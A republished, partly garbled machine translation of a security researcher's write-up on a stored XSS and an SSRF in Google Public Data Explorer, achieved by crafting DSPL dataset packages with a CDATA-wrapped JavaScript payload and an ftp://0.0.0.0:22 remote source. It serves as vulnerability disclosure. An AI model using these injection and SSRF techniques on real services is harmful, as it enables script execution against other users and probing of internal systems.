Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

See how I construct the DSPL language pack and discover Google's storage XSS and SSRF vulnerabilities

2025-01-15 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article is about how I construct the DSPL language pack and find the storage XSS and SSRF loopholes in Google. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article.

The following is about how I construct a storage XSS vulnerability in the environment requesting www.google.com by carefully crafting the Google dataset Publishing language (DSPL) package. In addition, I use the remote data source function of DSPL to achieve local service access (that is, SSRF).

The dataset Publishing language DSPL of Google

Google dataset Publishing language: Google makes use of its strong network data collection capabilities and has a number of applications in data mining and visualization. By building visual commercial and public service levels, it is convenient for third-party companies and individuals to make full data collection visualization. Users can use Google's dataset Publishing language (Dataset Publishing Language,DSPL) interface to link their own databases to Google's visualization tools to achieve convenient personal customization data visualization.

Google's Open data browser (Public Data Explorer) is a data search and visualization tool that charts common search requests based on official data to reflect search results in a more intuitive visual form. For example, we can use it to easily collect and visualize large data sets such as government health expenditure and World Bank data.

DSPL uses XML to describe the metadata in the dataset, as well as CSV data files, such as the sample.zip package format under DSPL:

Archive: sample.zipLength Date Time Name- 246 02-01-2018 13:19 countries.csv 221 02-14-2011 17:13 country_slice.csv 7812 03-04-2018 21:12 dataset.xml 246 02-14-2011 17:13 gender_country_slice.csv 28 01-29- 2018 20:55 genders.csv 200 02-14-2011 17:13 state_slice.csv 300 01-29-2018 21:11 states.csv--9053 7 files

A hint of a leak

The problem is that Google's Open data browser (Public Data Explorer) does not check whether the metadata is effectively encoded or securely verified when using the metadata provided in the dataset archive.

Take the use of this dataset as an example:

Curl https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/dspl/tutorial1.0.zip-o sample.zip

Unzip sample.zip; rm sample.zip

You can change the metadata name value of the dataset.xml file in the dataset. In addition, in the following XML file, you can use the CDATA section to include the execution script (Payload) of JavaScript to prevent it from being parsed as a XML tag:

Confirm (document.domain)]] > Some very interesting statistics about countries http://google.com

After that, perform the following two steps:

Zip-r poc.dspl *

Upload the above elaborate dataset file to Google Public data browser (Public Data Explorer) and share it publicly.

As a result, any user who clicks to view the dataset will be executed a malicious JavaScript script (such as Coinhive) crafted by an attacker in the www.google.com request environment.

Vulnerability PoC testing

In the following video, we can see that a dataset package containing malicious scripts is constructed. After uploading and deploying, the predetermined script can be executed successfully:

Http://v.youku.com/v_show/id_XMzQ3MTM0Njk0OA==.html

Https://vimeo.com/258923005

Moreover, because DSPL also has the ability to retrieve data from remote HTTP or FTP sources, SSRF attacks can be realized by using this function and the above defects to access the service data resources of some local hosts (in addition, in-depth use, it can also indirectly access the internal network system isolated from the Internet in the target system, which further poses a security threat to the system or devices in the target system.

For example, change the content in poc.dspl/dataset.xml as follows:

Ftp://0.0.0.0:22

When uploading and sharing the dataset, the Google server returns the error handling response of the HTTP/FTP request, which shows the SSH detailed banner information of the Google server. In fact, this is a kind of server information that should not be displayed publicly:

The above is to see how I construct the DSPL language pack and find the storage XSS and SSRF vulnerabilities of Google. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report